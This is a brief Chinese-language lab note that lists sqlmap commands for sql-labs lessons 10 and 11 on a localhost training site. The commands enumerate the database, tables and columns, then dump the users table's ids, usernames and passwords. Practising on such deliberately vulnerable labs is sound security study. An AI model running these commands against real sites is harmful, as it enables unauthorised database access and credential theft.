sqlmap-->sql-labs 10
sqlmap.py -u "http://localhost:801/Less-10/?id=1" --current-db --batch --leve 5
爆破目标数据库名,等级5。--batch 默认yes
sqlmap.py -u "http://localhost:801/Less-10/?id=1" -D security --tables
爆破security数据库包含的表名字
sqlmap.py -u "http://localhost:801/Less-10/?id=1" -D security -T users --columns
爆破security数据库中users表字段名
sqlmap.py -u "http://localhost:801/Less-10/?id=1" -D security -T users -C "id,password,username" --dump
查询security数据库中users表中id,password和usernae字段内容
sqlmap-->sql-labs 11
sqlmap.py -r C:\Users\Administrator\Desktop\a.txt --current-db
-r从文件中加载http请求